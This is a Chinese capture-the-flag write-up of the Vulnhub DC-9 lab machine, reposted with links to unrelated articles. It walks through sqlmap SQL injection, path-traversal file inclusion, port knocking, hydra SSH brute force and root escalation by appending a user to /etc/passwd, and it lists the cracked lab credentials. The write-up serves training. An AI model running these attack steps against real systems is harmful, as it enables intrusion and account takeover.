Vulnhub靶场----9、DC-9

news2024/11/26 4:42:58

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

DC-9下载地址:https://download.vulnhub.com/dc/DC-9.zip
kali:192.168.144.148
DC-9:192.168.144.158


二、渗透流程

1、信息收集

nmap -T5 -A -p- -sV -sT 192.168.144.158

思路:

1、80端口

目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……

3、目录扫描、指纹识别

结果暂无有用信息,对页面功能点进行检查
目录扫描:dirsearch -u http://192.168.144.158
指纹识别:whatweb http://102.168.144.158


2、漏洞探测

2.1、SQL注入

1.爆数据库

方法1:sqlmap -r 1.txt --dbs  #抓包POST注入
方法2:sqlmap -u "http://192.168.144.158/results.php" --data "search=1" --dbs

2.爆Staff数据库的表

方法1:sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D Staff --tables
方法2:sqlmap -r 1.txt -D Staff --tables

3.爆Users表的字段

方法1:sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D Staff -T Users --dump
方法2:sqlmap -r 1.txt -D Staff -T Users --dump 

4.解密password

md5解密地址:https://www.somd5.com/
账号 密码:admin transorbital1

5.爆数据库users的表

sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D users --tables
sqlmap -r 1.txt -D users --tables 

6.爆UserDetails表的字段

sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D users -T  UserDetails --dump
sqlmap -r 1.txt -D users -T UserDetails --dump

思路:
1、获取到admin账号和密码,登录后台;
2、users数据库爆破出的账号密码暂时无用。


2.2、文件包含

1.登录后台

文件包含线索:1.页面显示File does not exist;2.目录爆破的时候发现include目录。

2./etc/password

wfuzz -b 'PHPSESSID=jto9ulf88r04ds3570qb4sfl4b' --hw 100  -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.144.158/manage.php?FUZZ=../../../../../../../../../etc/passwd

访问:http://192.168.144.158/manage.php?file=../../../../../../../../../etc/passwd


2.3、连接SSH

1.利用UserDetails表的字段,爆破ssh账号密码

 hydra -L user-dict -P pass-dict 192.168.144.158 ssh

思路:
1、用户被限制登录
2、运行了knockd服务
3、端口被限制(防火墙)

2.访问敲门服务配置文件knockd.conf
http://192.168.144.158/manage.php?file=…/…/…/…/…/…/…/…/…/…/etc/knockd.conf


3.利用nmap进行敲门

4.22端口开启

5.再次爆破ssh账密

 hydra -L user-dict -P pass-dict 192.168.144.158 ssh

爆破出有3个用户,chandlerb UrAG0D!joeyt Passw0rdjanitor Ilovepeepee

6.ssh连接
ssh chandlerb@192.168.144.158

ssh joeyt@192.168.144.158

ssh janitor@192.168.144.158

发现新的密码文件

结合之前获取到的账号,再次进行爆破

得到用户:fredf B4-Tru3-001
使用账密登录ssh:ssh fredf@192.168.144.158


3、权限

发现无需密码,就可以以root权限执行的文件

sudo -l

查看test文件,发现其为乱码

./test查看文件用法

usage:test.py文件的读和追加。

查找test.py文件

find / -name "test.py" 2>/dev/null
cat /opt/devstuff/test.py


md5加盐加密

 openssl passwd -1 -salt testDC9 123456

-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密

写入/tmp临时目录下

echo 'testDC9:$1$testDC9$7DqifpbKzKYKpgnH4SUlz.:0:0::/root:/bin/bash' >> /tmp/passwd


在root权限的目录下运行test程序

 cd /opt/devstuff/dist/test/
 sudo ./test /tmp/passwd /etc/passwd
 su testDC9


查看flag


三、思路总结

1、信息收集2280端口;
2、web站点,发现sql注入和文件包含;
3、利用sql注入获取到账号密码登录后台;
4、利用文件包含查看敲门服务配置文件knockd.conf;
5、ssh连接,查看文件;
6、寻找可以root权限执行的文件;
7、写入用户,以root身份运行。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/385022.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

IDEA Android 网格布局(GridLayout)示例(计算器界面布局)

网格布局(GridLayout) 示例程序效果(实现类似vivo手机自带计算器UI) 真机和模拟器运行效果: 简述: GridLayout(网格布局)和TableLayout(表格布局)有类似的地方,通俗来讲可以理解为…

搜广推 Product-based Neural Networks (PNN) - 改进特征交叉的方式

😄 PNN:2016年上海交通大学提出。 文章目录 1、PNN1.1、原理1.2、创新点:product层1.3、product层z部分的输出:l~z~ 的计算方式:1.4、product层z部分的输出:l~p~ 的计算方式:1.4.1、IPNN1.4.2、OPNN1.5、优点1.6、缺点Reference1、PNN PNN:Product-based Neural Netwo…

Spark 故障排除

1 故障排除一:控制reduce端缓冲大小以避免OOM 在Shuffle过程,reduce端task并不是等到map端task将其数据全部写入磁盘后再去拉取,而是map端写一点数据,reduce端task就会拉取一小部分数据,然后立即进行后面的聚合、算子…

colletions学习和链式调用,以及优雅的展示代码

1,python 中尽量减少缩进可以直接 if code ! 1: return {msg:2003} 继续写下面的逻辑 2,关于(1),(1,)区别 (1)表示直接计算运行 (1*2*345&a…

Leetcode.2359 找到离给定两个节点最近的节点

题目链接 Leetcode.2359 找到离给定两个节点最近的节点 Rating : 1715 题目描述 给你一个 n个节点的 有向图 ,节点编号为 0到 n - 1,每个节点 至多 有一条出边。 有向图用大小为 n下标从 0开始的数组 edges表示,表示节点 i有一条…

数字档案室测评的些许感悟

我是甲方,明明我家是档案“室”,为什么申请的是数字档案“馆”? 笔者正对着手里的一份方案苦笑,甲方爸爸是某机关单位档案室,方案最后的附件赫然写着几个大字:“申请国家级数字档案馆……“。这样的事屡见…

SpringMVC再学习

基于原生的Servlet,通过了功能强大的前端控制器DispatcherServlet,对请求和相应进行统一处理 如今我们不再去web.xml中去主持servlet 而是直接创建一个配置类ServletContainersInitConfig去基础AbstractDispatcherServletInitializer createServletApp…

高性能 WPF 图表控件LightningChart.NET:支持从 Web 服务器获取数据 | 附最新版试用下载

LightningChart.NET 是一款高性能 WPF 和 Winforms 图表,可以实时可视化多达1万亿个数据点。可有效利用CPU和内存资源,实时监控数据流。同时,LightningChart使用突破性创新技术,以实时优化为前提,大大提升了实时渲染的效率和效果&…

Python的面向对象,详细讲解Python之用处等基本常识

目录 Python 面向对象 面向对象技术简介 创建类 实例 实例 self代表类的实例,而非类 实例 创建实例对象 访问属性 实例 Python内置类属性 实例 python对象销毁(垃圾回收) 实例 实例 类的继承 实例 方法重写 实例 基础重载方法 运算符重载 实例…

机器学习: 可视化反卷积操作

转置卷积操作的详细分解 1. 简介 转置卷积是用于生成图像的,尽管它们已经存在了一段时间,并且得到了很好的解释——我仍然很难理解它们究竟是如何完成工作的。我分享的文章[1]描述了一个简单的实验来说明这个过程。我还介绍了一些有助于提高网络性能的技…

yolov5的基本配置

yolov5的基本配置train.pydata.yaml数据集标签文件格式:总结train.py def parse_opt(knownFalse):parser argparse.ArgumentParser()parser.add_argument(--weights, typestr, defaultROOT / yolov5s.pt, helpinitial weights path)parser.add_argument(--cfg, typestr, defau…

【Java面试篇】Spring中@Transactional注解事务失效的常见场景

文章目录Transactional注解的失效场景☁️前言🍀前置知识🍁场景一:Transactional应用在非 public 修饰的方法上🍁场景二: propagation 属性设置错误🍁场景三:rollbackFor属性设置错误&#x1f3…

Apache druid未授权命令执行漏洞复现

简介 Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图…

【蓝桥杯嵌入式】拓展板之数码管显示

文章目录硬件电路连接方式函数实现文章福利硬件电路 通过上述原理图,可知拓展板上的数码管是一个共阴数码管,也就是说某段数码管接上高电平时,就会点亮。   上述原理图还给出一个提示,即:三个数码管分别与三个74HC59…

十八、Django-restframework之请求和响应(三)

1. 请求对象 REST框架引入了一个扩展了常规HttpRequest的请求对象, 并提供更灵活的请求解析。请求对象的核心功能是属性request.data,这与request.POST类似,但对于WebAPIs更有用。 request.POST # Only handles form data. Only works fo…

Barra模型因子的构建及应用系列五之NonLinear Size因子

一、摘要 在前期的Barra模型系列文章中,我们构建了Size因子、Beta因子、Momentum因子和Residual Volatility因子,并分别创建了对应的单因子策略,本节文章在该系列下进一步构建NonLinear Size因子。从回测结果看,自2022年以来&…

ConcurrentHashMap-Java八股面试(五)

系列文章目录 第一章 ArrayList-Java八股面试(一) 第二章 HashMap-Java八股面试(二) 第三章 单例模式-Java八股面试(三) 第四章 线程池和Volatile关键字-Java八股面试(四) 提示:动态每日更新算法题,想要学习的可以关注一下 文章目录系列文章目录一、…

基于卷积神经网络CNN的三相故障识别

目录 背影 卷积神经网络CNN的原理 卷积神经网络CNN的定义 卷积神经网络CNN的神经元 卷积神经网络CNN的激活函数 卷积神经网络CNN的传递函数 卷积神经网络CNN手写体识别 基本结构 主要参数 MATALB代码 结果图 展望 背影 现在生活,为节能减排,减少电能损…

Ajax学习 基础概念 发送请求 常见方法

AJAX 简介 AJAX 全称为Asynchronous Javascript And XML ,就是异步的JS和XML。 通过AJAX可以再浏览器中向服务器发送异步请求,最大的优势:无刷新获取数据。 AJAX 不是新的编程语言,而是一种将现有的标准组合在一起使用的新方式。…

从FPGA说起的深度学习(四)

这是新的系列教程,在本教程中,我们将介绍使用 FPGA 实现深度学习的技术,深度学习是近年来人工智能领域的热门话题。在本教程中,旨在加深对深度学习和 FPGA 的理解。用 C/C 编写深度学习推理代码高级综合 (HLS) 将 C/C 代码转换为硬…